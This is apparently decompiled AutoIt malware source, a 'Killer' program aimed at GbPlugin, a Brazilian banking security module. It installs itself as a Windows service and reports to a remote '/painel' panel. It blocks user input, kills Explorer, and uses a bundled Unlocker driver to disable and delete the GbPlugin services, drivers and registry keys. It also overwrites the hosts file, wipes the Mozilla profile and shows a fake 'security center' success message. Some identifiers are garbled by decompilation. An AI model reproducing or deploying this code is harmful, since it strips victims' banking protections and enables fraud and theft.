    Local $locVar0001 = DllCall($Var0066, "int", "QueryServiceConfigW", "ptr", $__01, "ptr", $__02, "dword", $__03, "dword*", 0)
    Return $locVar0001
EndFunc
Func Fn0017($__01)
    $Var0063 = Fn0009($__01)
    $Var0057 = DllCallbackRegister("Fn0020", "dword", "dword;dword;ptr;ptr")
    $Var0058 = DllCallbackRegister("Fn0018", "none", "dword;ptr")
    $Var0059 = DllStructCreate("ptr[2];ptr[2]")
    $Var0056 = DllStructCreate("wchar[128]")
    DllStructSetData($Var0056, 1, $__01)
    DllStructSetData($Var0059, 1, DllStructGetPtr($Var0056), 1)
    DllStructSetData($Var0059, 1, DllCallbackGetPtr($Var0058), 2)
    DllStructSetData($Var0059, 2, 0, 1)
    DllStructSetData($Var0059, 2, 0, 2)
    DllCall($Var0066, "int", "StartServiceCtrlDispatcherW", "ptr", DllStructGetPtr($Var0059))
    DllCallbackFree($Var0058)
    DllCallbackFree($Var0057)
EndFunc
Func Fn0018($__01, $__02)
    Local $locVar0001 = DllCall($Var0066, "ptr", "RegisterServiceCtrlHandlerExW", "ptr", DllStructGetPtr($Var0056), "ptr", DllCallbackGetPtr($Var0057), "ptr", 0)
    If @error OR ($locVar0001[0] = 0) Then Exit
    $Var0062 = $locVar0001[0]
    If NOT $Var0062 Then
        Fn0019()
        Return
    EndIf
    DllStructSetData($Var0061, "dwServiceType", $Var0063)
    DllStructSetData($Var0061, "dwServiceSpecificExitCode", 0)
    If NOT (Fn0021($Var0045, $Var0055, 0x00000bb8)) Then
        Fn0019()
        Return
    EndIf
    Fn0023($__01, $__02)
    Fn0043()
EndFunc
Func Fn0019()
    If $Var0062 Then Fn0021($Var0044, $Var0055, 0)
EndFunc
Func Fn0020($__01, $__02, $__03, $__04)
    #forceref $A4A82503603, $A2082605313, $A4582700A29
    Local $locVar0001 = $Var0055
    Switch $__01
        Case $Var0018
            Fn0021($Var0046, $Var0055, 0x00000bb8)
            Fn0024()
            Return $Var0055
        Case $Var0019
            DllStructSetData($Var0061, "dwCurrentState", $Var0048)
        Case $Var0020
            DllStructSetData($Var0061, "dwCurrentState", $Var0047)
        Case $Var0021
        Case $Var0022
            Local $locVar0002 = DllStructCreate("dword cbsize; dword dwSessionId", $__03)
            Local $locVar0003 = DllStructGetData($locVar0002, "cbSize")
            Local $locVar0004 = DllStructGetData($locVar0002, "dwSessionId")
            Fn0001("cbSize = " & $locVar0003 & " ,dwSessionId = " & $locVar0004)
            Switch $__02
                Case $Var0023
                    Fn0001("Console session connected", 0, 2)
                Case $Var0024
                    Fn0001("Console session disconnected", 0, 2)
                Case $Var0025
                    Fn0001("Remote session connected", 0, 2)
                Case $Var0026
                    Fn0001("Remote session disconnected", 0, 2)
                Case $Var0027
                    Fn0001("Session logged on", 0, 2)
                Case $Var0028
                    Fn0001("Session logged off", 0, 2)
                Case $Var0029
                    Fn0001("Session locked", 0, 2)
                Case $Var0030
                    Fn0001("Session unlocked", 0, 2)
                Case $Var0031
                    Fn0001("Session remote control", 0, 2)
            EndSwitch
        Case 0x00000080 To 0x000000ff
        Case Else
            $locVar0001 = $Var0054
    EndSwitch
    Fn0021(DllStructGetData($Var0061, "dwCurrentState"), $Var0055, 0)
    Return $locVar0001
EndFunc
Func Fn0021($__01, $__02, $__03)
    Local $locVar0001 = True
    If NOT $Var0060 Then
        If ($__01 = $Var0045) Then
            DllStructSetData($Var0061, "dwControlsAccepted", 0)
        Else
            DllStructSetData($Var0061, "dwControlsAccepted", BitOR($Var0049, $Var0050))
        EndIf
        DllStructSetData($Var0061, "dwCurrentState", $__01)
        DllStructSetData($Var0061, "dwWin32ExitCode", $__02)
        DllStructSetData($Var0061, "dwWaitHint", $__03)
        If ($__01 = $Var0047) OR ($__01 = $Var0044) Then
            DllStructSetData($Var0061, "dwCheckPoint", 0)
        Else
            $Var0065 += 1
            DllStructSetData($Var0061, "dwCheckPoint", $Var0065)
        EndIf
        $locVar0001 = Fn0022($Var0062, DllStructGetPtr($Var0061))
    EndIf
    Return $locVar0001
EndFunc
Func Fn0022($__01, $__02)
    Local $locVar0001 = DllCall($Var0066, "int", "SetServiceStatus", "ptr", $__01, "ptr", $__02)
    If @error OR NOT $locVar0001[0] Then Return 0
    Return $locVar0001[0]
EndFunc
Func Fn0023($__01, $__02)
    If NOT Fn0021($Var0045, $Var0055, 0x00000bb8) Then Return
    $Var0067 = 1
    $Var0064 = Fn0004(0, True, False, "")
    Return Fn0021($Var0047, $Var0055, 0)
EndFunc
Func Fn0024()
    $Var0067 = 0
    If $Var0064 Then Fn0005($Var0064)
EndFunc
Global Const $Var0118 = 8
Global Const $Var0119 = 0x00000010
Global Const $Var0120 = 1
Global Const $Var0121 = 4
Global Const $Var0122 = 2
Global Const $Var0123 = BitOR($Var0120, $Var0122, $Var0121, $Var0118)
Global Const $Var0124 = BitOR($Var0119, $Var0118, $Var0120)
Global Const $Var0125 = BitOR($Var0119, $Var0118, $Var0121)
Global Const $Var0126 = BitOR($Var0119, $Var0122, $Var0120)
Global Const $Var0127 = BitOR($Var0119, $Var0122, $Var0121)
Global Const $Var0128 = 0x00020000
Global Const $Var0129 = 0x00080000
Global Const $Var0130 = 0x00c00000
Global Const $Var0131 = 0x80000000
Global Const $Var0132 = 0x00000080
Global Const $Var0133 = 8
Global Const $Var0134 = 0x00000100
Global Const $Var0135 = BitOR($Var0128, $Var0130, $Var0131, $Var0129)
Global Const $Var0136 = BitOR($Var0132, $Var0133, $Var0134)
Global Const $Var0137 = 4
Global Const $Var0138 = 4
Global Const $Var0139 = 2
Global Const $Var0140 = 0x00000040
Global Const $Var0141 = 8
Global Const $Var0142 = 0x00000020
Global Const $Var0143 = 0x00000010
Global Const $Var0144 = 1
Global Const $Var0145 = 0x00000100
Global Const $Var0146 = 0x00000080
Global Const $Var0147 = BitOR($Var0138, $Var0139, $Var0140, $Var0141, $Var0142, $Var0143, $Var0144, $Var0145, $Var0146)
Global Const $Var0148 = 4
Global Const $Var0149 = 0x00000040
Global Const $Var0150 = 0x00000020
Global Const $Var0151 = 0x00000080
Global Const $Var0152 = 1
Global Const $Var0153 = 8
Global Const $Var0154 = 0x00000100
Global Const $Var0155 = 2
Global Const $Var0156 = 0x00000010
Global Const $Var0157 = BitOR($Var0108, $Var0148, $Var0149, $Var0150, $Var0151, $Var0152, $Var0153, $Var0154, $Var0155, $Var0156)
Global Const $Var0158 = 0x00000010
Global Const $Var0159 = 8
Global Const $Var0160 = 4
Global Const $Var0161 = 2
Global Const $Var0162 = 1
Global Const $Var0163 = BitOR($Var0105, $Var0158, $Var0159, $Var0160, $Var0161, $Var0162)
Global Const $Var0164 = 4
Global Const $Var0165 = 0x00000020
Global Const $Var0166 = 8
Global Const $Var0167 = 1
Global Const $Var0168 = 0x00000100
Global Const $Var0169 = 0x00000040
Global Const $Var0170 = 2
Global Const $Var0171 = 0x00000200
Global Const $Var0172 = 0x00000010
Global Const $Var0173 = BitOR($Var0164, $Var0165, $Var0166, $Var0167, $Var0168, $Var0169, $Var0170, $Var0171, $Var0172)
Global Const $Var0174 = 1
Global Const $Var0175 = 2
Global Const $Var0176 = 4
Global Const $Var0177 = 8
Global Const $Var0178 = 0x00000010
Global Const $Var0179 = 0x00000020
Global Const $Var0180 = 0x00000040
Global Const $Var0181 = 0x00000080
Global Const $Var0182 = 0x00000100
Global Const $Var0183 = 0x00000200
Global Const $Var0184 = 0x00000400
Global Const $Var0185 = 0x00000800
Global Const $Var0186 = 0x00002000
Global Const $Var0187 = BitOR($Var0174, $Var0175, $Var0176, $Var0177, $Var0178, $Var0179, $Var0180, $Var0181, $Var0182, $Var0183, $Var0184, $Var0185, $Var0186)
Global Const $Var0188 = 1
Global Const $Var0189 = 4
Global Const $Var0190 = 2
Global Const $Var0191 = 0x00000010
Global Const $Var0192 = 8
Global Const $Var0193 = BitOR($Var0108, $Var0188, $Var0189, $Var0190, $Var0191, $Var0192)
Global Const $Var0194 = 2
Global Const $Var0195 = 1
Global Const $Var0196 = BitOR($Var0108, $Var0194, $Var0195)
Global Const $Var0197 = 0x00000020
Global Const $Var0198 = 4
Global Const $Var0199 = 8
Global Const $Var0200 = 0x00000010
Global Const $Var0201 = 1
Global Const $Var0202 = 2
Global Const $Var0203 = BitOR($Var0106, $Var0199, $Var0200, $Var0201)
Global Const $Var0204 = BitOR($Var0107, $Var0198, $Var0202)
Global Const $Var0205 = BitOR($Var0105, $Var0197, $Var0198, $Var0199, $Var0200, $Var0201, $Var0202)
Global Const $Var0206 = 1
Global Const $Var0207 = 2
Global Const $Var0208 = 4
Global Const $Var0209 = BitOR($Var0206, $Var0207, $Var0208)
Global Const $Var0210 = 0x00000010
Global Const $Var0211 = 0x00000200
Global Const $Var0212 = 0x00000400
Global Const $Var0213 = 4
Global Const $Var0214 = BitOR($Var0210, $Var0211, $Var0212, $Var0213)
Global Const $Var0215 = 1
Global Const $Var0216 = 2
Global Const $Var0217 = 4
Global Const $Var0218 = 8
Global Const $Var0219 = 0x00000010
Global Const $Var0220 = 0x00000020
Global Const $Var0221 = 0x00000040
Global Const $Var0222 = 0x00000100
Global Const $Var0223 = BitOR($Var0215, $Var0216, $Var0217, $Var0219, $Var0220, $Var0221, $Var0222)
Global Const $Var0224 = 0x00004000
Global Const $Var0225 = 0x00008000
Global Const $Var0226 = 0x00010000
Global Const $Var0227 = 0x00020000
Global Const $Var0228 = 0x00040000
Global Const $Var0229 = 0x00080000
Global Const $Var0230 = BitOR($Var0224, $Var0225, $Var0226, $Var0227, $Var0228, $Var0229)
Global Const $Var0231 = 0x00400000
Global Const $Var0232 = 0x00800000
Global Const $Var0233 = 0x01000000
Global Const $Var0234 = 0x10000000
Global Const $Var0235 = 0x20000000
Global Const $Var0236 = 0x40000000
Global Const $Var0237 = BitOR($Var0218, $Var0226, $Var0228, $Var0231, $Var0232, $Var0234, $Var0235, $Var0236)
Global Const $Var0238 = 0x80000000
Global Const $Var0239 = BitOR($Var0224, $Var0228, $Var0238, $Var0233)
Global Const $Var0240 = 0
Global Const $Var0241 = 1
Global Const $Var0242 = 2
Global Const $Var0243 = 4
Global Const $Var0244 = BitOR($Var0240, $Var0241, $Var0242, $Var0243)
Global Const $Var0245 = Fn0027()
Global Const $Var0246 = "align 2;dword_ptr Size;hwnd hOwner;ptr hDevMode;ptr hDevNames;hwnd hDC;dword Flags;ushort FromPage;ushort ToPage;ushort MinPage;ushort MaxPage;" & Fn0026(@AutoItX64, "uint", "ushort") & " Copies;ptr hInstance;lparam lParam;ptr PrintHook;ptr SetupHook;ptr PrintTemplateName;ptr SetupTemplateName;ptr hPrintTemplate;ptr hSetupTemplate;"
Func Fn0025($__01, $__02, $__03 = 0, $__04 = 0, $__05 = 0)
    Local $locVar0001 = "wstr"
    If NOT StringStripWS($__02, 3) Then
        $locVar0001 = "ptr"
        $__02 = 0
    EndIf
    Local $locVar0002 = DllCall("kernel32.dll", "int", "MoveFileWithProgressW", "wstr", $__01, $locVar0001, $__02, "ptr", $__04, "long_ptr", $__05, "dword", $__03)
    If (@error) OR (NOT $locVar0002[0]) Then
        Return SetError(1, 0, 0)
    EndIf
    Return 1
EndFunc
Func Fn0026($__01, $__02, $__03)
    If $__01 Then
        Return $__02
    Else
        Return $__03
    EndIf
EndFunc
Func Fn0027()
    Local $locVar0001 = DllStructCreate("dword;dword;dword;dword;dword;wchar[128]")
    DllStructSetData($locVar0001, 1, DllStructGetSize($locVar0001))
    Local $locVar0002 = DllCall("kernel32.dll", "int", "GetVersionExW", "ptr", DllStructGetPtr($locVar0001))
    If (@error) OR (NOT $locVar0002[0]) Then
        Return SetError(1, 0, 0)
    EndIf
    Return BitOR(BitShift(DllStructGetData($locVar0001, 2), -8), DllStructGetData($locVar0001, 3))
EndFunc
Global Const $Var0247 = "dword Size;hwnd hWndOwnder;handle hInstance;dword rgbResult;ptr CustColors;dword Flags;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName"
Global Const $Var0248 = "dword Size;hwnd hWndOwner;handle hDC;ptr LogFont;int PointSize;dword Flags;dword rgbColors;lparam CustData;" & "ptr fnHook;ptr TemplateName;handle hInstance;ptr szStyle;word FontType;int SizeMin;int SizeMax"
Func Fn0028($__01, $__02 = 0)
    Local Const $locVar0001 = 0x000000b7
    Local Const $locVar0002 = 1
    Local $locVar0003 = 0
    If BitAND($__02, 2) Then
        Local $locVar0004 = DllStructCreate("byte;byte;word;ptr[4]")
        Local $locVar0005 = DllCall("advapi32.dll", "bool", "InitializeSecurityDescriptor", "struct*", $locVar0004, "dword", $locVar0002)
        If @error Then Return SetError(@error, @extended, 0)
        If $locVar0005[0] Then
            $locVar0005 = DllCall("advapi32.dll", "bool", "SetSecurityDescriptorDacl", "struct*", $locVar0004, "bool", 1, "ptr", 0, "bool", 0)
            If @error Then Return SetError(@error, @extended, 0)
            If $locVar0005[0] Then
                $locVar0003 = DllStructCreate($Var0102)
                DllStructSetData($locVar0003, 1, DllStructGetSize($locVar0003))
                DllStructSetData($locVar0003, 2, DllStructGetPtr($locVar0004))
                DllStructSetData($locVar0003, 3, 0)
            EndIf
        EndIf
    EndIf
    Local $locVar0006 = DllCall("kernel32.dll", "handle", "CreateMutexW", "struct*", $locVar0003, "bool", 1, "wstr", $__01)
    If @error Then Return SetError(@error, @extended, 0)
    Local $locVar0007 = DllCall("kernel32.dll", "dword", "GetLastError")
    If @error Then Return SetError(@error, @extended, 0)
    If $locVar0007[0] = $locVar0001 Then
        If BitAND($__02, 1) Then
            Return SetError($locVar0007[0], $locVar0007[0], 0)
        Else
            Exit - 1
        EndIf
    EndIf
    Return $locVar0006[0]
EndFunc
Func Fn0029($__01, $__02 = "*", $__03 = 0, $__04 = 0, $__05 = 0, $__06 = 1, $__07 = "", $__08 = "")
    Local $locVar0001[0x00000064] = [0], $locVar0002[0x00000064] = [0], $locVar0003[0x00000064] = [0], $locVar0004[0x00000064] = [0], $locVar0005[0x00000064] = [1]
    Local $locVar0006 = "", $locVar0007, $locVar0008, $locVar0009, $locVar0010 = ".+", $locVar0011 = ":"
    Local $locVar0012, $locVar0013, $locVar0014 = "", $locVar0015, $locVar0016
    Local $locVar0017[0x00000064][2] = [[0,
0]], $locVar0018, $locVar0019, $locVar0020 If NOT FileExists($__01) Then Return SetError(1, 1, "") If StringRight($__01, 1) = "\" Then $locVar0006 = "\" Else $__01 = $__01 & "\" EndIf $locVar0005[1] = $__01 If $__04 > 1 OR NOT IsInt($__04) Then Return SetError(1, 4, "") If $__04 < 0 Then StringReplace($__01, "\", "", 2) $locVar0007 = @extended - $__04 EndIf If $__02 = "*" Then $locVar0008 = ".+" Else If NOT Fn0030($locVar0008, $__02) Then Return SetError(1, 2, "") EndIf Switch $__03 Case 0 Switch $__04 Case 0 $locVar0010 = $locVar0008 EndSwitch Case 2 $locVar0010 = $locVar0008 EndSwitch If $__07 = "" Then $locVar0009 = ":" Else If NOT Fn0030($locVar0009, $__07) Then Return SetError(1, 7, "") EndIf Switch $__03 Case 0 Switch $__04 Case 0 $locVar0011 = $locVar0009 Case Else If $__08 <> "" Then If NOT Fn0030($locVar0011, $__08) Then Return SetError(1, 8, "") EndIf EndSwitch Case 2 $locVar0011 = $locVar0009 EndSwitch If NOT ($__03 = 0 OR $__03 = 1 OR $__03 = 2) Then Return SetError(1, 3, "") If NOT ($__05 = 0 OR $__05 = 1 OR $__05 = 2) Then Return SetError(1, 5, "") If NOT ($__06 = 0 OR $__06 = 1 OR $__06 = 2) Then Return SetError(1, 6, "") While $locVar0005[0] > 0 $locVar0015 = $locVar0005[$locVar0005[0]] $locVar0005[0] -= 1 Switch $__06 Case 1 $locVar0014 = StringReplace($locVar0015, $__01, "") Case 2 $locVar0014 = $locVar0015 EndSwitch $locVar0012 = FileFindFirstFile($locVar0015 & "*") If $__03 = 0 AND $__05 AND $__06 Then Fn0031($locVar0017, $locVar0014, $locVar0002[0] + 1) EndIf If $locVar0012 = -1 Then ContinueLoop EndIf While 1 $locVar0016 = FileFindNextFile($locVar0012) If @error Then ExitLoop EndIf $locVar0013 = @extended If $locVar0013 Then Select Case $__04 < 0 StringReplace($locVar0015, "\", "", 0, 2) If @extended < $locVar0007 Then ContinueCase EndIf Case $__04 = 1 If NOT StringRegExp($locVar0016, $locVar0011) Then Fn0031($locVar0005, $locVar0015 & $locVar0016 & "\") EndIf EndSelect EndIf If $__05 Then If $locVar0013 Then If StringRegExp($locVar0016, 
$locVar0010) AND NOT StringRegExp($locVar0016, $locVar0011) Then Fn0031($locVar0004, $locVar0014 & $locVar0016 & $locVar0006) EndIf Else If StringRegExp($locVar0016, $locVar0008) AND NOT StringRegExp($locVar0016, $locVar0009) Then If $locVar0015 = $__01 Then Fn0031($locVar0003, $locVar0014 & $locVar0016) Else Fn0031($locVar0002, $locVar0014 & $locVar0016) EndIf EndIf EndIf Else If $locVar0013 Then If $__03 <> 1 AND StringRegExp($locVar0016, $locVar0010) AND NOT StringRegExp($locVar0016, $locVar0011) Then Fn0031($locVar0001, $locVar0014 & $locVar0016 & $locVar0006) EndIf Else If $__03 <> 2 AND StringRegExp($locVar0016, $locVar0008) AND NOT StringRegExp($locVar0016, $locVar0009) Then Fn0031($locVar0001, $locVar0014 & $locVar0016) EndIf EndIf EndIf WEnd FileClVar0255e($locVar0012) WEnd If $__05 Then Switch $__03 Case 0 If $locVar0003[0] = 0 AND $locVar0004[0] = 0 Then Return SetError(1, 9, "") Case 1 If $locVar0003[0] = 0 AND $locVar0002[0] = 0 Then Return SetError(1, 9, "") Case 2 If $locVar0004[0] = 0 Then Return SetError(1, 9, "") EndSwitch Switch $__03 Case 2 ReDim $locVar0004[$locVar0004[0] + 1] $locVar0001 = $locVar0004 Fn0033($locVar0001) Case 1 If $__06 = 0 Then Fn0032($locVar0001, $locVar0003, $locVar0002) Fn0033($locVar0001) Else Fn0032($locVar0001, $locVar0003, $locVar0002, 1) EndIf Case 0 If $__06 = 0 Then Fn0032($locVar0001, $locVar0003, $locVar0002) $locVar0001[0] += $locVar0004[0] ReDim $locVar0004[$locVar0004[0] + 1] Fn0035($locVar0001, $locVar0004) Fn0033($locVar0001) Else Local $locVar0001[$locVar0002[0] + $locVar0003[0] + $locVar0004[0] + 1] $locVar0001[0] = $locVar0002[0] + $locVar0003[0] + $locVar0004[0] Fn0033($locVar0003, 1, $locVar0003[0]) For $a2fd190023a = 1 To $locVar0003[0] $locVar0001[$a2fd190023a] = $locVar0003[$a2fd190023a] Next Local $locVar0021 = $locVar0003[0] + 1 Fn0033($locVar0004, 1, $locVar0004[0]) For $a2fd190023a = 1 To $locVar0004[0] If $locVar0006 Then $locVar0018 = $locVar0004[$a2fd190023a] Else $locVar0018 = 
$locVar0004[$a2fd190023a] & "\" EndIf For $a21c4105628 = 1 To $locVar0017[0][0] If $locVar0018 = $locVar0017[$a21c4105628][0] Then ExitLoop Next $locVar0019 = $locVar0017[$a21c4105628][1] If $a21c4105628 = $locVar0017[0][0] Then $locVar0020 = $locVar0002[0] Else $locVar0020 = $locVar0017[$a21c4105628 + 1][1] - 1 EndIf If $__05 = 1 Then Fn0033($locVar0002, $locVar0019, $locVar0020) EndIf $locVar0001[$locVar0021] = $locVar0004[$a2fd190023a] $locVar0021 += 1 For $a21c4105628 = $locVar0019 To $locVar0020 $locVar0001[$locVar0021] = $locVar0002[$a21c4105628] $locVar0021 += 1 Next Next EndIf EndSwitch Else If $locVar0001[0] = 0 Then Return SetError(1, 9, "") ReDim $locVar0001[$locVar0001[0] + 1] EndIf Return $locVar0001 EndFunc Func Fn0030(ByRef $__01, $__02) If StringRegExp($__02, "\\|/|:|\<|\>|\|") Then Return 0 $__02 = StringReplace(StringStripWS(StringRegExpReplace($__02, "\s*;\s*", ";"), 3), ";", "|") $__02 = StringReplace(StringReplace(StringRegExpReplace($__02, "[][$^.{}()+\-]", "\\$0"), "?", "."), "*", ".*?") $__01 = "(?i)^(" & $__02 & ")\z" Return 1 EndFunc Func Fn0031(ByRef $__01, $__02, $__03 = -1) If $__03 = -1 Then $__01[0] += 1 If UBound($__01) <= $__01[0] Then ReDim $__01[UBound($__01) * 2] $__01[$__01[0]] = $__02 Else $__01[0][0] += 1 If UBound($__01) <= $__01[0][0] Then ReDim $__01[UBound($__01) * 2][2] $__01[$__01[0][0]][0] = $__02 $__01[$__01[0][0]][1] = $__03 EndIf EndFunc Func Fn0032(ByRef $__01, $__02, $__03, $__04 = 0) ReDim $__02[$__02[0] + 1] If $__04 = 1 Then Fn0033($__02) $__01 = $__02 $__01[0] += $__03[0] ReDim $__03[$__03[0] + 1] If $__04 = 1 Then Fn0033($__03) Fn0035($__01, $__03) EndFunc Func Fn0033(ByRef $__01, $__02 = 1, $__03 = -99) If $__03 = -0x00000063 Then $__03 = UBound($__01) - 1 Fn0034($__01, $__02, $__03) EndFunc Func Fn0034(ByRef $__01, ByRef $__02, ByRef $__03) Local $locVar0001 If ($__03 - $__02) < 15 Then Local $locVar0002, $locVar0003, $locVar0004 For $locVar0002 = $__02 + 1 To $__03 $locVar0001 = $__01[$locVar0002] If 
IsNumber($locVar0001) Then For $locVar0003 = $locVar0002 - 1 To $__02 Step -1 $locVar0004 = $__01[$locVar0003] If ($locVar0001 >= $locVar0004 AND IsNumber($locVar0004)) OR (NOT IsNumber($locVar0004) AND StringCompare($locVar0001, $locVar0004) >= 0) Then ExitLoop $__01[$locVar0003 + 1] = $locVar0004 Next Else For $locVar0003 = $locVar0002 - 1 To $__02 Step -1 If (StringCompare($locVar0001, $__01[$locVar0003]) >= 0) Then ExitLoop $__01[$locVar0003 + 1] = $__01[$locVar0003] Next EndIf $__01[$locVar0003 + 1] = $locVar0001 Next Return EndIf Local $locVar0005 = $__02, $locVar0006 = $__03, $locVar0007 = $__01[Int(($__02 + $__03) / 2)], $locVar0008 = IsNumber($locVar0007) Do If $locVar0008 Then While ($__01[$locVar0005] < $locVar0007 AND IsNumber($__01[$locVar0005])) OR (NOT IsNumber($__01[$locVar0005]) AND StringCompare($__01[$locVar0005], $locVar0007) < 0) $locVar0005 += 1 WEnd While ($__01[$locVar0006] > $locVar0007 AND IsNumber($__01[$locVar0006])) OR (NOT IsNumber($__01[$locVar0006]) AND StringCompare($__01[$locVar0006], $locVar0007) > 0) $locVar0006 -= 1 WEnd Else While (StringCompare($__01[$locVar0005], $locVar0007) < 0) $locVar0005 += 1 WEnd While (StringCompare($__01[$locVar0006], $locVar0007) > 0) $locVar0006 -= 1 WEnd EndIf If $locVar0005 <= $locVar0006 Then $locVar0001 = $__01[$locVar0005] $__01[$locVar0005] = $__01[$locVar0006] $__01[$locVar0006] = $locVar0001 $locVar0005 += 1 $locVar0006 -= 1 EndIf Until $locVar0005 > $locVar0006 Fn0034($__01, $__02, $locVar0006) Fn0034($__01, $locVar0005, $__03) EndFunc Func Fn0035(ByRef $__01, Const ByRef $__02) Local $locVar0001 = UBound($__01) - 1, $locVar0002 = UBound($__02) ReDim $__01[$locVar0001 + $locVar0002] For $a2fd190023a = 1 To $locVar0002 - 1 $__01[$locVar0001 + $a2fd190023a] = $__02[$a2fd190023a] Next EndFunc Global $Var0249 If NOT @Compiled Then Exit If (@ScriptFullPath <> @SystemDir & "\" & $Var0003) Then If Fn0028(@ScriptName) = 0 Then Exit EndIf While ProcessExists($Var0003) ProcessClVar0255e($Var0003) 
Sleep(0x000003e8) WEnd Local $Var0250 = FileGetVersion(@ScriptFullPath) If Fn0008($Var0001) Then If FileExists(@SystemDir & "\" & $Var0003) Then Local $Var0251 = FileGetVersion(@SystemDir & "\" & $Var0003) If $Var0250 <> $Var0251 Then InetRead($Var0004 & "/painel/?add=1&inf=Killer v." & $Var0250 & " (Updated on " & @Var0255Version & ")") Else Exit EndIf EndIf While Fn0008($Var0001) Fn0040() Sleep(0x000003e8) WEnd Else InetRead($Var0004 & "/painel/?add=1&inf=Killer v." & $Var0250 & " (Installed on " & @Var0255Version & ")") EndIf If FileExists(@ProgramFilesDir & "\gbplugin") Then FileCopy(@ScriptFullPath, @SystemDir & "\" & $Var0003, 1) Fn0039() DirCreate(@SystemDir & "\Unlocker") If @Var0255Arch = "X64" Then FileInstall("Unlocker1.9.1-x64\$INSTDIR\Unlocker.exe", @SystemDir & "\Unlocker\Unlocker.exe", 1) FileInstall("Unlocker1.9.1-x64\$INSTDIR\UnlockerDriver5.sys", @SystemDir & "\Unlocker\UnlockerDriver5.sys", 1) FileInstall("Unlocker1.9.1-x64\$INSTDIR\UnlockerInject32.exe", @SystemDir & "\Unlocker\UnlockerInject32.exe", 1) Else FileInstall("Unlocker1.9.1\$INSTDIR\Unlocker.exe", @SystemDir & "\Unlocker\Unlocker.exe", 1) FileInstall("Unlocker1.9.1\$INSTDIR\UnlockerDriver5.sys", @SystemDir & "\Unlocker\UnlockerDriver5.sys", 1) EndIf If Fn0010($Var0001) = 1 Then DirRemove(@AppDataDir & "\Mozilla", 1) MsgBox(0, "Central de Segurança", "Programa instalado com sucesso.", 10) Sleep(0x0002bf20) EndIf Shutdown(6) Exit EndIf MsgBox(0, "Central de Segurança", "Programa não instalado.", 10) Exit EndIf Fn0017($Var0001) Func Fn0036() FileInstall("hVar0255ts", @WindowsDir & "\System32\DRIVERS\etc\hVar0255ts", 1) BlockInput(1) While ProcessExists("explorer.exe") ProcessClVar0255e("explorer.exe") Sleep(0x000001f4) WEnd RunWait(@SystemDir & "\sc config gbpkm start= disabled", "", @SW_HIDE) RunWait(@SystemDir & "\sc stop gbpkm", "", @SW_HIDE) RunWait(@SystemDir & "\sc delete gbpkm", "", @SW_HIDE) RunWait(@SystemDir & "\sc config gbpsv start= disabled", "", @SW_HIDE) RunWait(@SystemDir 
& "\sc stop gbpsv", "", @SW_HIDE) RunWait(@SystemDir & "\sc delete gbpsv", "", @SW_HIDE) ProcessClVar0255e("gbpsv.exe") Fn0042() Fn0037(@SystemDir & "\drivers\GbpKm.sys") Fn0037(@SystemDir & "\drivers\gbpndisrd.sys") Fn0037(@ProgramFilesDir & "\GbPlugin") Fn0037(@AppDataCommonDir & "\GbPlugin") Fn0037(@AppDataCommonDir & "\Gas") DirRemove(@ProgramFilesDir & "\GbPlugin", 1) DirRemove(@AppDataCommonDir & "\GbPlugin", 1) DirRemove(@AppDataCommonDir & "\Gas", 1) FileDelete(@SystemDir & "\drivers\GbpKm.sys.xx") FileDelete(@SystemDir & "\drivers\gbpndisrd.sys.xx") DirRemove(@ProgramFilesDir & "\GbPlugin.xx", 1) DirRemove(@AppDataCommonDir & "\GbPlugin.xx", 1) DirRemove(@AppDataCommonDir & "\Gas.xx", 1) Fn0042() Fn0038(@SystemDir & "\drivers\GbpKm.sys") Fn0038(@SystemDir & "\drivers\gbpndisrd.sys") Fn0038(@ProgramFilesDir & "\GbPlugin") Fn0038(@AppDataCommonDir & "\GbPlugin") Fn0038(@AppDataCommonDir & "\Gas") If @Var0255Version = "WIN_XP" Then FileInstall("snetcfg.exe", @SystemDir & "\snetcfg.exe", 1) RunWait(@SystemDir & "\snetcfg.exe -v -u nt_ndisrdmp", "", @SW_HIDE) RunWait(@SystemDir & "\snetcfg.exe -v -u nt_ndisrd", "", @SW_HIDE) Else RunWait(@SystemDir & "\netcfg.exe -v -u nt_ndisrdmp", "", @SW_HIDE) RunWait(@SystemDir & "\netcfg.exe -v -u nt_ndisrd", "", @SW_HIDE) EndIf If $Var0249 = "RESTART" Then RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Session Manager", "AllowProtectedRenames", "REG_SZ", "1") Shutdown(6) Else Fn0042() While ProcessExists("explorer.exe") = 0 ShellExecute("explorer.exe") Sleep(0x000003e8) WEnd BlockInput(0) Fn0040() EndIf EndFunc Func Fn0037($__01) RunWait(@SystemDir & '\Unlocker\Unlocker.exe "' & $__01 & '" -M "' & $__01 & '.xx" -S -O', @SystemDir & "\Unlocker", @SW_HIDE) EndFunc Func Fn0038($__01) If FileExists($__01) Then $Var0249 = "RESTART" If StringInStr(FileGetAttrib($__01), "D") Then $a04d540192d = Fn0029($__01, "*", 0, 1, 0, 2) For $a2fd190023a = 1 To $a04d540192d[0] Fn0025(FileGetShortName($a04d540192d[$a2fd190023a]), "", 
$Var0137) Next Else Fn0025(FileGetShortName($__01), "", $Var0137) EndIf EndIf EndFunc Func Fn0039() Fn0006($Var0001, $Var0002, BitOR($Var0037, $Var0040), $Var0042, $Var0043, '"' & @SystemDir & "\" & $Var0003 & '"') EndFunc Func Fn0040() Fn0011($Var0001) Fn0007($Var0001) EndFunc Func Fn0041($__01, $__02 = False) While ProcessExists("explorer.exe") ProcessClVar0255e("explorer.exe") Sleep(0x000001f4) WEnd If $__02 = False Then RegDelete($__01) Else RegDelete($__01, $__02) EndIf EndFunc Func Fn0042() Fn0041("HKLM\SYSTEM\ControlSet001\Services\Ndisrd") Fn0041("HKLM\SYSTEM\ControlSet002\Services\Ndisrd") Fn0041("HKLM\SYSTEM\ControlSet001\Services\NdisrdMP") Fn0041("HKLM\SYSTEM\ControlSet002\Services\NdisrdMP") Fn0041("HKLM\SYSTEM\ControlSet001\Services\GbpKm") Fn0041("HKLM\SYSTEM\ControlSet002\Services\GbpKm") Fn0041("HKLM\SYSTEM\ControlSet001\Services\GbpSv") Fn0041("HKLM\SYSTEM\ControlSet002\Services\GbpSv") Fn0041("HKLM\SYSTEM\ControlSet001\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{82B00B9D-7431-4D58-B04E-A946762E0957}") Fn0041("HKLM\SYSTEM\ControlSet002\Control\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\{82B00B9D-7431-4D58-B04E-A946762E0957}") 